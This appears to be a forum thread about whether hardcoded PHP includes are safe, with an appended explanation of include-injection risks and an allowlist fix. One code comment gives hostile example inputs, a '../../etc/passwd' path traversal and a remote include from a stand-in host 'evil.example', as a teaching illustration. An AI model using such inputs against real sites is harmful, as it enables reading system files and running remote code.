scotthorton asked:
is this PHP include a security risk?

I have some code that is mostly static, but changes once every few months.  It is related to the display of a set of logos on my webpage, and navigation bar item changes.  Instead of having to go and update every single webpage that includes these same items each time the list of logo images changes, or I need a new navigation bar item,  I needed to be able to globally edit them.

I chose to do this using PHP includes such as:

<?php include("includes/bannerlist.html"); ?>
<?php include("includes/navbar.html"); ?>

This seems to be a good solution and is working.

All references to include files are hard coded as shown above, and all related files are stored locally on the same webserver/site.

I have read about security issues related to PHP includes but they seemed to be related to more complex things than what I am doing.

My question is, are the includes I have, like those shown above, any type of security risk?  And if they are, what is the best way to mitigate the risk?



ASKER CERTIFIED SOLUTION by christophermccann (United Kingdom)
[solution text only available to Experts Exchange members]

SOLUTION by Chris Harte (United Kingdom)
[solution text only available to Experts Exchange members]

SOLUTION
[solution text only available to Experts Exchange members]
scotthorton (ASKER):
Thanks.

Almost conflicting replies though.  

I will not be passing any get variables in the includes.

I can change the include files to .php.

MunderMan, can you tell me what permissions should I set in .htaccess for the includes?

I'll check out the security link.  May be over my head, but I'll see.  I just wanted to make sure I wasn't making a huge blunder by using these includes to simplify my site file management.

Thanks guys,
Scott


Not "a huge blunder" - quite the opposite.  You're doing it the right way.  And if it's working right for you I would not change the file types or mess with the locations or the permissions.  Sure, it's possible for somebody to look into those URL paths and see the HTML you have in the include files, but what harm is that?  They can see it with "view source" on your web pages!
Ray:

Thanks. Is there a real-life story behind that explanation? <big grin>

FWIW, I am the only one with root access, including the host.  And my handful of users are not allowed any shell access.  It's a low-end rented dedicated server, but of course the provider could get into it with console access.  I don't think the PO'd wife can though <grin>.  Well, unless she's the IT brain in the fam...

Happily, no!  But it makes the useful illustration.  What do we want to protect and what do we want to guard against?  If it's nuclear codes, the situation is somewhat different when compared to money, or medical records, or fishing statistics.  

Best to all, ~Ray
In the .htaccess file, include the line

"deny from all"

if you are worried about it.
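A worked illustration of the distinction the thread turns on, added here as an example and not code from any of the posters: the hardcoded include the asker uses is the safe form, and the "security issues with PHP includes" one reads about arise only when the include path is built from request data. The directory layout, the `fragment` request parameter and the `fragmentPath()` helper are assumptions made for the illustration.

```php
<?php
// Added example, not code from the thread. Assumed layout: this file sits in
// the web root and the shared fragments live in ./includes/ beside it.

// (a) The asker's form: a hardcoded, local path. Nothing the client sends
//     influences which file PHP reads, so there is no include-injection risk.
include __DIR__ . '/includes/navbar.html';

// (b) The form the security articles warn about. NEVER do this: the request
//     decides the path, so "?page=../../../../etc/passwd" reads that file,
//     and with allow_url_include=On "?page=http://evil.example/x" pulls in
//     and executes remote code.
//     include 'includes/' . $_GET['page'];

// (c) If a page really must pick a fragment by request parameter, map the
//     parameter through a fixed allowlist so the client selects a key, never
//     a path. The parameter name "fragment" is assumed for illustration.
function fragmentPath(string $key): ?string
{
    $allowed = [
        'banners' => 'bannerlist.html',
        'navbar'  => 'navbar.html',
    ];
    if (!array_key_exists($key, $allowed)) {
        return null;                            // unknown key: refuse it
    }
    return __DIR__ . '/includes/' . $allowed[$key];
}

$path = fragmentPath($_GET['fragment'] ?? 'banners');
if ($path === null) {
    http_response_code(400);
    exit('unknown fragment');
}
include $path;
```

The `deny from all` suggested above belongs in `includes/.htaccess` and only stops a browser from fetching the fragment files directly over HTTP; it has no effect on `include`, which reads them from disk, so the pages keep working. On Apache 2.4 the equivalent directive is `Require all denied` unless `mod_access_compat` is loaded, in which case the old syntax still works.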